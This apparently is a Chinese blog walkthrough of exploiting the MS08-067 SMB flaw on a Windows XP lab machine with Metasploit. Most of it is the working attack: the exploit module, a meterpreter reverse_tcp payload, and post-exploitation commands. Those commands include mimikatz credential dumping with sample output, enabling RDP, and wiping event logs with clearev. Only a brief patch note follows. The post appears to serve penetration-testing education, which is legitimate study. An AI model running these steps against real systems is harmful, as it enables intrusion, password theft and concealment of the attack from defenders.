Metasploit MS08-067 漏洞利用演示

  • Metasploit MS08-067 漏洞利用演示

    • MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。
    • 原理解析:

      • 攻击者利用windows操作系统默认开放的SMB服务445端口发送恶意代码到目标主机,通过MSRPC接口调用Server服务的一个函数,溢出栈缓冲区,获得远程代码执行权限,从而完全控制主机Windows系统主要的网络服务程序。
      • SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。
      • MSRPC网络服务
        • 这个服务能够完美的调用远程服务器上服务进程的过程。采用的网络传输层协议包括:
        • ncacn_ip_tcp  135
        • ncadg_ip_udp  135
        • ncacn_np  (TCP 139和445)主要是这个,SMB命名管道传输协议
      • server服务--支持计算机通过网络的文件、打印、和命名管道共享。如果服务停止,这些功能不可用。如果服务被禁用,任何直接依赖于此服务的服务将无法启动。
    • 漏洞利用演示

      • 演示环境

        • 靶机:Windows XP sp3 (192.168.2.6)
        • 攻击机:kali 2020 (192.168.2.3)
      • 1、首先测试一下在Kali上能够ping通靶机

      • 2、使用nmap扫描靶机是否存在MS08-067漏洞

        • nmap --script=vuln 192.168.2.6
      • 3、启动Metasploit

        • msfconsle
      • 4、搜索MS08-067的攻击模块

        • search ms8-067
        • 输出的信息一共包括6列,分别是#(模块编号)、Name(模块名称)、Disclosure Date(发布日期)、Rank(级别)、Check(是否支持检察)和Description(描述)。
      • 5、启用该攻击模块

        • use exploit/windows/smb/ms08_067_netapi
      • 6、显示攻击载荷

        • show payloads
      • 7、查看支持的目标系统

        • show targets
      • 8、设置攻击有效载荷

        • set payload windows/meterpreter/reverse_tcp
      • 9、查看Payload配置选项

        • show options
        • 输出的信息包括模块选项、Payload选项和利用的目标三部分。前两个选项信息分为四列,分别是Name(名称)、Current Setting(当前设置)、Required(需要)和Description(描述)。如果Required列的值为yes,则表示该项必须设置;如果为no,则可以不设置。
      • 10、设置RHOSTS选项

        • set RHOSTS 192.168.2.6
      • 11、实施渗透测试

        • exploit 或者 run
      • 12、Meterpreter

        • Meterpreter是Metasploit的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
        • 1)捕获屏幕
          • meterpreter > screenshot
          • Screenshot saved to: /root/diIxqzrL.jpeg
        • 2)上传/下载文件
          • meterpreter > upload 1.txt c:\\
          • meterpreter > download c:\\1.txt
        • 3)远程桌面
          • meterpreter > run vnc
        • 4)进入目标主机shell
          • meterpreter > shell
            • Process 960 created.
            • Channel 14 created.
            • Microsoft Windows XP [Version 5.1.2600]
            • (C) Copyright 1985-2001 Microsoft Corp.
          • C:\WINDOWS\system32>exit
            • exit
        • 5)获取用户密码
          • meterpreter > load mimikatz
            • Loading extension mimikatz...Success.
          • meterpreter > mimikatz_command -f sekurlsa::wdigest -a "full"
            • "0;70234","NTLM","ping","A-3326A091E7764","
            • ping,A-3326A091E7764,abc.123"
            • "0;997","Negotiate","LOCAL SERVICE","NT AUTHORITY",""
            • "0;996","Negotiate","NETWORK SERVICE","NT AUTHORITY","
            • A-3326A091E7764$,WORKGROUP,"
            • "0;45664","NTLM","","",""
            • "0;999","NTLM","A-3326A091E7764$","WORKGROUP",""
        • 6)启用远程桌面
          • meterpreter > run post/windows/manage/enable_rdp
            • [*] Enabling Remote Desktop
            • [*] RDP is disabled; enabling it ...
            • [*] Setting Terminal Services service startup mode
            • [*] The Terminal Services service is not set to auto, changing it to auto ...
            • [*] Opening port in local firewall if necessary
            • [*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201104235514_default_192.168.2.6_host.windows.cle_291746.txt
          • 查看远程用户的空闲时长
          • meterpreter > idletime
            • User has been idle for: 19 mins 23 secs
          • 使用rdesktop命令远程连接桌面
            • root@kali:~# rdesktop 192.168.2.6
              • Protocol(warning): process_pdu_logon(), Unhandled login infotype 1
              • Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request
        • 7)清除日志
          • meterpreter > clearev
            • [*] Wiping 48 records from Application...
            • [*] Wiping 63 records from System...
            • [*] Wiping 0 records from Security...
        • 8)解决方案

          • 升级到最新的Windows系统
          • 安装KB958644补丁
  •  
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值